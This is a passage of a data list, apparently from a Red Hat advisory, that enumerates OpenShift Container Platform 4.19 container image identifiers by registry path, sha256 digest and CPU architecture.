"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
